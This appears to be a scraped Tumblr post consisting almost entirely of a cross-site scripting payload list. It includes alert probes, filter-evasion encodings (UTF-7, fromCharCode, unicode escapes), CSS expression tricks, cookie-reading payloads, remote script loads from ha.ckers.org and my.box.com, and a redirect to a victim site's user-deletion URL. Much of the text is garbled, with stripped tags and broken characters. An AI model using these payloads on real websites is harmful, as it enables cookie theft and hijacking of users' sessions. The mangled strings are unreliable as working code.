#114;
Explore tagged Tumblr posts
Visit Tumblr Blog
Explore Tumblr blogs with no restrictions, modern design and the best experience.
Last Seen Tumblr Blogs
Fun Fact
The “We are the 99%” Tumblr blog became the slogan for the Occupy Wall Street movement.
Conversation
alert(123);
alert("XSS");
alert(123)
alert("hellox worldss");
alert(�XSS�)
alert(�XSS�);
alert(�XSS�)
�>alert(�XSS�)
alert(/XSS�)
alert(/XSS/)
alert(1)
�; alert(1);
�)alert(1);//
alert(1)
{font-family:''
alert(1) {Opera}
prompt(1)
/*%00*/alert(1)/*%00*/%00
X
 src=`~` onerror=prompt(1)>
 src="javascript:alert(1)"
;>
>Xalert(document.location)XYZalert(String.fromCharCode(49))/**/alert(document.location)/**/
onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
X
alert(0%0)
alert
(1)>
SPAN
">{-o-link-source:''
onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
^__^
X {IE7}
////
/*iframe/src*/
//|\\ //|\\ /{src:''/
|\>''alert(1) {Opera}
DIV
X
On Mouse Over
Click Here
X
http://www.alert(1)
alert(1)
click
MsgBox+1
X
~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')
+-+-1-+-+alert(1)
/*
alert(1)
ClickMe
alert(1) style="x:">
x
">
CLICKME
click
Click Me
String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)
�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�>�>�>alert(String.fromCharCode(88,83,83))
alert(�XSS�)�>
%253cscript%253ealert(1)%253c/script%253e
�>alert(document.cookie)
fooalert(1)
ipt>alert(1)ipt>
'>alert(String.fromCharCode(88,83,83))
'" SRC="http://ha.ckers.org/xss.js">
document.write("
'>alert(String.fromCharCode(88,83,83))
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
alert("hellox worldss")&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
alert("XSS");&search=1
0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->">'>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search
hellox worldss
...
lol
foo=">alert(1)">
foo=">alert(1)">
foo=">">
LOL
LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}
({0:#0=alert/#0#/#0#(0)})
LOLalert(123)
alert(/XSS/.source)
\\";alert('XSS');//
alert(\"XSS\");
<BR SIZE=\"&{alert('XSS')}\">
@import'http://ha.ckers.org/xss.css';
BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}
li {list-style-image: url(\"javascript:alert('XSS')\");}XSS
�scriptualert(EXSSE)�/scriptu
@im\port'\ja\vasc\ript:alert(\"XSS\")';
exp/*
xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
alert('XSS');
.XSS{background-image:url(\"javascript:alert('XSS')\");}
BODY{background:url(\"javascript:alert('XSS')\")}
alert('XSS');
a=\"get\";
b=\"URL(\\"\";
c=\"javascript:\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
]]>
echo('IPT>alert(\"XSS\")'); ?>
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
` SRC=\"http://ha.ckers.org/xss.js\">
document.write(\"
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
%3C
<
<
<
\x3c
\x3C
\u003c
\u003C
perl -e 'print \"alert(\\"XSS\\")\";' > out
perl -e 'print \"\";' > out
ascript:alert('XSS');\">
ascript:alert('XSS');\">
'';!--\"=&{()}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//-->\">'>alert(String.fromCharCode(88,83,83))
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
'';!--"=&{()}
alert("XSS")">
a=/XSS/alert(a.source)
\";alert('XSS');//
alert("XSS");
�script�alert(�XSS�)�/script�
@im\port'\ja\vasc\ript:alert("XSS")';
exp/*
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
document.write("
TESTHTML5FORMACTION
crosssitespt
foo=">alert(1)">
foo=">alert(1)">
({0:#0=alert/#0#/#0#(123)})
ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x
Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()
{alert(1)};1
crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')
alert(1)
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
�>alert(document.cookie)
�>alert(document.cookie)
�>
fooalert(document.cookie)
ipt>alert(document.cookie)ipt>
%22/%3E%3CBODY%20onload=�document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)�%3E
�; alert(document.cookie); var foo=�
foo\�; alert(document.cookie);//�;
alert(document.cookie)
alert(1)
">alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))
0 notes